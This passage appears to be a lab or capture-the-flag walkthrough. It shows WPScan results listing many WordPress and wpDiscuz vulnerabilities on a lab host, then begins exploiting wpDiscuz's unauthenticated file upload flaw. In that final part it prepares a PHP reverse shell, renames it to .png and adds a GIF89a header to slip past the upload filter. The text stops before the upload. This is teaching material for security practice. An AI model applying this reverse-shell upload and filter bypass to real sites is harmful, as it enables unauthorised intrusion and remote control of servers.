 | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API

 |     Fixed in: 4.9.13

 |     References:

 |      - https://wpscan.com/vulnerability/4a6de154-5fbd-4c80-acd3-8902ee431bd8

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788

 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw

 |

 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links

 |     Fixed in: 4.9.13

 |     References:

 |      - https://wpscan.com/vulnerability/23553517-34e3-40a9-a406-f3ffbe9dd265

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042

 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/

 |      - https://hackerone.com/reports/509930

 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7

 |

 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content

 |     Fixed in: 4.9.13

 |     References:

 |      - https://wpscan.com/vulnerability/be794159-4486-4ae1-a5cc-5c190e5ddf5f

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780

 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v

 |

 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass

 |     Fixed in: 4.9.13

 |     References:

 |      - https://wpscan.com/vulnerability/8fac612b-95d2-477a-a7d6-e5ec0bb9ca52

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041

 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53

 |

 | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated

 |     Fixed in: 4.9.14

 |     References:

 |      - https://wpscan.com/vulnerability/7db191c0-d112-4f08-a419-a1cd81928c4e

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027

 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/

 |      - https://core.trac.wordpress.org/changeset/47634/

 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw

 |

 | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts

 |     Fixed in: 4.9.14

 |     References:

 |      - https://wpscan.com/vulnerability/d1e1ba25-98c9-4ae7-8027-9632fb825a56

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028

 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/

 |      - https://core.trac.wordpress.org/changeset/47635/

 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w

 |

 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer

 |     Fixed in: 4.9.14

 |     References:

 |      - https://wpscan.com/vulnerability/4eee26bd-a27e-4509-a3a5-8019dd48e429

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025

 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/

 |      - https://core.trac.wordpress.org/changeset/47633/

 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c

 |

 | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache

 |     Fixed in: 4.9.14

 |     References:

 |      - https://wpscan.com/vulnerability/e721d8b9-a38f-44ac-8520-b4a9ed6a5157

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029

 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/

 |      - https://core.trac.wordpress.org/changeset/47637/

 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c

 |

 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads

 |     Fixed in: 4.9.14

 |     References:

 |      - https://wpscan.com/vulnerability/55438b63-5fc9-4812-afc4-2f1eff800d5f

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026

 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/

 |      - https://core.trac.wordpress.org/changeset/47638/

 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2

 |      - https://hackerone.com/reports/179695

 |

 | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure

 |     Fixed in: 4.9.17

 |     References:

 |      - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450

 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/

 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq

 |      - https://core.trac.wordpress.org/changeset/50717/

 |      - https://www.youtube.com/watch?v=J2GXmxAdNWs

 |

 | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer

 |     Fixed in: 4.9.18

 |     References:

 |      - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296

 |      - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62

 |      - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/

 |      - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9

 |      - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/

 |      - https://www.youtube.com/watch?v=HaW15aMzBUM

 |

 | [!] Title: WordPress < 5.8 - Plugin Confusion

 |     Fixed in: 5.8

 |     References:

 |      - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223

 |      - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/

 |

 | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query

 |     Fixed in: 4.9.19

 |     References:

 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84

 |      - https://hackerone.com/reports/1378209

 |

 | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs

 |     Fixed in: 4.9.19

 |     References:

 |      - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w

 |      - https://hackerone.com/reports/425342

 |      - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability

 |

 | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query

 |     Fixed in: 4.9.19

 |     References:

 |      - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86

 |

 | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites

 |     Fixed in: 4.9.19

 |     References:

 |      - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663

 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h

 |      - https://hackerone.com/reports/541469

 |

 | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery

 |     Fixed in: 4.9.20

 |     References:

 |      - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09

 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/

 |

 | [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting

 |     Fixed in: 4.9.21

 |     References:

 |      - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be

 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/

 |

 | [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting

 |     Fixed in: 4.9.21

 |     References:

 |      - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0

 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/

 |

 | [!] Title: WP < 6.0.2 - SQLi via Link API

 |     Fixed in: 4.9.21

 |     References:

 |      - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f

 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/

 |

 | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283

 |

 | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095

 |

 | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44

 |

 | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc

 |

 | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0

 |

 | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef

 |

 | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955

 |

 | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8

 |

 | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f

 |

 | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492

 |

 | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e

 |

 | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg

 |     Fixed in: 4.9.22

 |     References:

 |      - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9

 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/

 |      - https://github.com/WordPress/gutenberg/pull/45045/files

 |

 | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding

 |     References:

 |      - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590

 |      - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/

 |

 | [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files

 |     Fixed in: 4.9.23

 |     References:

 |      - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745

 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/

 |

 | [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF

 |     Fixed in: 4.9.23

 |     References:

 |      - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532

 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/

 |

 | [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery

 |     Fixed in: 4.9.23

 |     References:

 |      - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5

 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/

 |

 | [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data

 |     Fixed in: 4.9.23

 |     References:

 |      - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89

 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/

 |      - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/

 |

 | [!] Title: WP < 6.2.1 - Contributor+ Content Injection

 |     Fixed in: 4.9.23

 |     References:

 |      - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670

 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/

 |

 | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning

 |     Fixed in: 4.9.24

 |     References:

 |      - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f

 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/

 |

 | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution

 |     Fixed in: 4.9.24

 |     References:

 |      - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59

 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/

 |

 | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure

 |     Fixed in: 4.9.24

 |     References:

 |      - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999

 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/

 |

 | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure

 |     Fixed in: 4.9.24

 |     References:

 |      - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561

 |      - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/

 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/

 |

 | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data

 |     Fixed in: 4.9.25

 |     References:

 |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225

 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/

 |

 | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload

 |     Fixed in: 4.9.25

 |     References:

 |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a

 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)

 Checking Known Locations - Time: 00:10:07 <=========================================> (105357 / 105357) 100.00% Time: 00:10:07

[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet

 | Location: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/

 | Last Updated: 2024-03-21T00:55:00.000Z

 | Readme: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

 | [!] The version is out of date, the latest version is 5.3.2

 |

 | Found By: Known Locations (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/, status: 200

 |

 | Version: 4.0.8 (100% confidence)

 | Found By: Readme - Stable Tag (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

[+] wpdiscuz

 | Location: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/

 | Last Updated: 2024-05-08T07:02:00.000Z

 | Readme: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt

 | [!] The version is out of date, the latest version is 7.6.19

 |

 | Found By: Known Locations (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/, status: 200

 |

 | [!] 16 vulnerabilities identified:

 |

 | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload

 |     Fixed in: 7.0.5

 |     References:

 |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186

 |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/

 |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz

 |

 | [!] Title: Comments - wpDiscuz < 7.3.2 - Admin+ Stored Cross-Site Scripting

 |     Fixed in: 7.3.2

 |     References:

 |      - https://wpscan.com/vulnerability/f51a350c-c46d-4d52-b787-762283625d0b

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24737

 |

 | [!] Title: wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF

 |     Fixed in: 7.3.4

 |     References:

 |      - https://wpscan.com/vulnerability/2746101e-e993-42b9-bd6f-dfd5544fa3fe

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24806

 |      - https://www.youtube.com/watch?v=CL7Bttu2W-o

 |

 | [!] Title: wpDiscuz < 7.3.12 - Sensitive Information Disclosure

 |     Fixed in: 7.3.12

 |     References:

 |      - https://wpscan.com/vulnerability/027e6ef8-39d8-4fa9-957f-f53ee7175c0a

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23984

 |

 | [!] Title: wpDiscuz < 7.6.4 - Unauthenticated Data Modification via IDOR

 |     Fixed in: 7.6.4

 |     References:

 |      - https://wpscan.com/vulnerability/d7de195a-a932-43dd-bbb4-784a19324b04

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3869

 |

 | [!] Title: wpDiscuz < 7.6.4 - Post Rating Increase/Decrease iva IDOR

 |     Fixed in: 7.6.4

 |     References:

 |      - https://wpscan.com/vulnerability/051ab8b8-210e-48ac-82e7-7c4a0aa2ecd5

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3998

 |

 | [!] Title: wpDiscuz < 7.6.12 - Unauthenticated Stored XSS

 |     Fixed in: 7.6.12

 |     References:

 |      - https://wpscan.com/vulnerability/f061ffa4-25f2-4ad5-9edb-6cb2c7b678d1

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47185

 |

 | [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection

 |     Fixed in: 7.6.6

 |     Reference: https://wpscan.com/vulnerability/ebb5ed9a-4fb2-4d64-a8f2-6957878a4599

 |

 | [!] Title: wpDiscuz < 7.6.4 - Author+ IDOR

 |     Fixed in: 7.6.4

 |     References:

 |      - https://wpscan.com/vulnerability/d5e677ef-786f-4921-97d9-cbf0c2e21df9

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46311

 |

 | [!] Title: wpDiscuz < 7.6.11 - Unauthenticated Content Injection

 |     Fixed in: 7.6.11

 |     References:

 |      - https://wpscan.com/vulnerability/8c8cabee-285a-408f-9449-7bb545c07cdc

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46310

 |

 | [!] Title: wpDiscuz < 7.6.11 - Insufficient Authorization to Comment Submission on Deleted Posts

 |     Fixed in: 7.6.11

 |     References:

 |      - https://wpscan.com/vulnerability/874679f2-bf44-4c11-bc3b-69ae5ac59ced

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46309

 |

 | [!] Title: wpDiscuz < 7.6.12 - Missing Authorization in AJAX Actions

 |     Fixed in: 7.6.12

 |     References:

 |      - https://wpscan.com/vulnerability/2e121d4f-7fdf-428c-8251-a586cbd31a96

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45760

 |

 | [!] Title: wpDiscuz < 7.6.12 - Cross-Site Request Forgery

 |     Fixed in: 7.6.12

 |     References:

 |      - https://wpscan.com/vulnerability/f8dfcc13-187c-4a83-a87e-761c0db4b6d9

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47775

 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/53af9dfd-eb2d-4f6f-b02f-daf790b95f1f

 |

 | [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection

 |     Fixed in: 7.6.6

 |     References:

 |      - https://wpscan.com/vulnerability/a2fec175-40f6-4a80-84ed-5b88251584de

 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd1e52c-83b7-4b3e-a791-a2c0ccd856bc

 |

 | [!] Title: wpDiscuz < 7.6.13 - Admin+ Stored XSS

 |     Fixed in: 7.6.13

 |     References:

 |      - https://wpscan.com/vulnerability/79aed6a7-a6e2-4429-8f98-ccac6b59fb4d

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51691

 |      - https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-12-cross-site-scripting-xss-vulnerability

 |

 | [!] Title: wpDiscuz < 7.6.16 - Authenticated (Author+) Stored Cross-Site Scripting via Uploaded Image Alternative Text

 |     Fixed in: 7.6.16

 |     References:

 |      - https://wpscan.com/vulnerability/f3a337ae-54e5-41ca-a0d9-60745b568469

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2477

 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eddc03d-ecff-4b50-a574-7b6b62e53af0

 |

 | Version: 7.0.4 (80% confidence)

 | Found By: Readme - Stable Tag (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt

[+] WPScan DB API OK

 | Plan: free

 | Requests Done (during the scan): 3

 | Requests Remaining: 22

[+] Finished: Thu May  9 23:33:35 2024

[+] Requests Done: 105396

[+] Cached Requests: 8

[+] Data Sent: 31.711 MB

[+] Data Received: 14.286 MB

[+] Memory used: 425.133 MB

[+] Elapsed time: 00:11:15

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$  

In the results, WP Scan identified 16 vulnerabilities within those plugins, which were not detected in our previous scan.

By exploiting one of these vulnerabilities, we can gain a foothold on the vulnerable server.

Foothold

To establish a foothold, I'll focus solely on exploiting the " Unauthenticated Arbitrary File Upload Vulnerability ." 

 | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload

 |     Fixed in: 7.0.5

 |     References:

 |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186

 |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/

 |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz

Exploiting this flaw in a WordPress plugin entails using it to upload a malicious file, typically a web shell or a reverse shell, to the target server.

To Learn More about File Upload Vulnerabilities:

File Upload Vulnerabilities

This guide explores the various security risks associated with file upload functionalities in web applications, and provides tips and best practices for mitigating these vulnerabilities to protect your application and users.

Exploitation: Gaining Reverse Shell via Unauthenticated Arbitrary File Upload Exploit

To upload the malicious file, we need to identify an area where uploads are possible.  Typically, on a blog, we can find such an area in the comment section. 

Let's check one of the posts.

Upon clicking on a post, I encountered an error message stating " Having trouble finding that site ." 

Resolving 'Having Trouble Finding That Site' Issue by Adding Host Address

This issue arises because the IP address is unable to access the " blogger.htm " domain. Therefore, we need to add this host.

To do this, open the hosts file located in the "/etc" directory using the Nano text editor.

┌──(kali㉿kali)-[~]

└─$ sudo nano /etc/hosts

[sudo] password for kali: 

Add the host to the file, 

Save it by pressing CTRL + X, and confirm with " yes ."

Afterward, refresh the webpage. 

When you navigate to the blog, you'll notice a comment section at the bottom. 

Within this section, you'll find a file upload option in the right-hand corner.

Obtaining a Shell via PHP Reverse Shell Upload

First, locate the php-reverse-shell file. 

┌──(kali㉿kali)-[~]

└─$ locate php reverse shell

/usr/share/laudanum/php/php-reverse-shell.php

/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

/usr/share/webshells/php/php-reverse-shell.php

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$

Let's copy this file to the Kali home directory.

┌──(kali㉿kali)-[~]

└─$ cp /usr/share/webshells/php/php-reverse-shell.php .    

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$ ls                      

Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  php-reverse-shell.php

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$

Before uploading the shell, we need to make some adjustments. Specifically, we must replace the IP address in the shell with our host-only adapter 's IP address. 

┌──(kali㉿kali)-[~]

└─$ nano php-reverse-shell.php 

Additionally, since uploads may be restricted to image files, let's rename the file extension from ".php" to ".png."

┌──(kali㉿kali)-[~]

└─$ mv php-reverse-shell.php shell.png

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$ ls

Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  shell.png

It looks like the uploaded file is detectable as a PHP file, so we need to bypass it by adding "GIF89a;" into the reverse shell file. 

┌──(kali㉿kali)-[~]

└─$ nano shell.png  

